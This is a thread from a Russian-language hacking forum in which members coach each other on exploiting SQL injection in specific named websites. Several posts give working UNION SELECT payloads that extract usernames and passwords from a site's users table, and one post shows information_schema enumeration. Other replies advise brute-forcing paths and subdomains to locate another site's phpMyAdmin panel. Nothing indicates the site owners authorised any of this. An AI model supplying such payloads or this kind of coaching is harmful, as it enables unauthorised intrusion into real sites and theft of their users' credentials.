20.01.2010, 16:12
|
|
Новичок
Регистрация: 18.12.2009
Сообщений: 13
С нами:
8629789
Репутация:
0
|
|
что за инъекция:...
http://www.aaadtc.com/page.php?content=buy&cnum=21
подставляя кавычку
http://www.aaadtc.com/page.php?content=buy&cnum=21'
вылетает ошибка
Fatal error: Call to a member function execute() on a non-object in /home/.rhino/lsdtc/mydtcbusiness.com/clientsites/bigdeli_nader/data/buy.php on line 92
После подбирая количество полей нахожу нужное количество. Но принтабельного поля нет...
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=0+union+select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
что это такое? |
|
|
20.01.2010, 16:52
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?
|
|
|
|
20.01.2010, 16:58
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от mff
Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?
Брутить пути и субдомены =)
Если phpmyadmin там есть вообще...
billing.centre.ru это не пойдет?
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
20.01.2010, 19:08
|
|
Познающий
Регистрация: 26.12.2009
Сообщений: 66
С нами:
8618831
Репутация:
-25
|
|
Посмотри в (субдоменны ))
|
|
|
|
20.01.2010, 19:22
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
GinTonic,
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+sel ect+1,2,password,4,5,6,7,8,9,10,11,username,13,14+ from+users--+
|
|
|
|
20.01.2010, 20:33
|
|
Новичок
Регистрация: 18.12.2009
Сообщений: 13
С нами:
8629789
Репутация:
0
|
|
Сообщение от ElteRUS
GinTonic,
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+sel ect+1,2,password,4,5,6,7,8,9,10,11,username,13,14+ from+users--+
а почему ноль на двойку заменил?
и почему в 3 и 12?
Последний раз редактировалось GinTonic; 20.01.2010 в 20:39..
|
|
|
|
20.01.2010, 21:09
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Сообщение от GinTonic
а почему ноль на двойку заменил?
и почему в 3 и 12?
смотри внимательней
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+select+1,2,password,4,5, 6,7,8,9,10,11,username,13,14+from+users--+
|
|
|
|
20.01.2010, 22:56
|
|
Новичок
Регистрация: 18.12.2009
Сообщений: 13
С нами:
8629789
Репутация:
0
|
|
Сообщение от ILYAtirtir
смотри внимательней
а для чего там all нужен?
|
|
|
|
20.01.2010, 21:36
|
|
Новичок
Регистрация: 12.01.2010
Сообщений: 13
С нами:
8593628
Репутация:
18
|
|
Для GinTonic:
1. Думаю для автора скули лутше так будет):
Код:
http://www.aaadtc.com/page.php?content=buy&cnum=-21+union+all+select+1,2,password,4,5,6,7,8,9,10,11,username,13,14+from+users--
2. Если убрать password и поставить 3 или 35656 то ты увидишь как сайт выведет эти числа, можно заменять любое число которое выводица на сайте при скуле, а уже пассворд и юсернаме это часть(столбцы) таблицы юсер для их вывода ты должен их знать!
Читай статьи на форуме))):
Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд
SQL инъекция (в т.ч. и blind SQL)
Примеры:
Sql Инъекции
Последний раз редактировалось Alf0x0ns; 20.01.2010 в 22:31..
|
|
|
|
21.01.2010, 01:10
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
С нами:
8816961
Репутация:
4
|
|
такой инъекшн, помогите раскрутить..
так все выводить, базу:таблицу:столбец
Код:
-133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,table_schema,table_name,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x75736572+LIMIT+0,1+--+
пытаюсь посмотреть данные, но ничего нет, тоесть вообще пусто, даже пропадают цифры, в принтабельных полях
Код:
-133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,USERID,USERNAME,USERPASSWORD),6,7,8,9,10+FROM+basename.user+LIMIT+0,1+--+
но ведь должны быть какие-то данные, я пробовал в других таблицах смотреть, но тоже самое, не выводит ничего. Может что не так делаю? Или все таки пустые таблицы?
зы Не хотелось бы светить сайт, может кто по асикю подскажет?
зыы и еще может кто нить подскажет, что можно почитать по скулям через куки, а то ничего толком найти не могу ((
Последний раз редактировалось Gidz; 21.01.2010 в 01:21..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
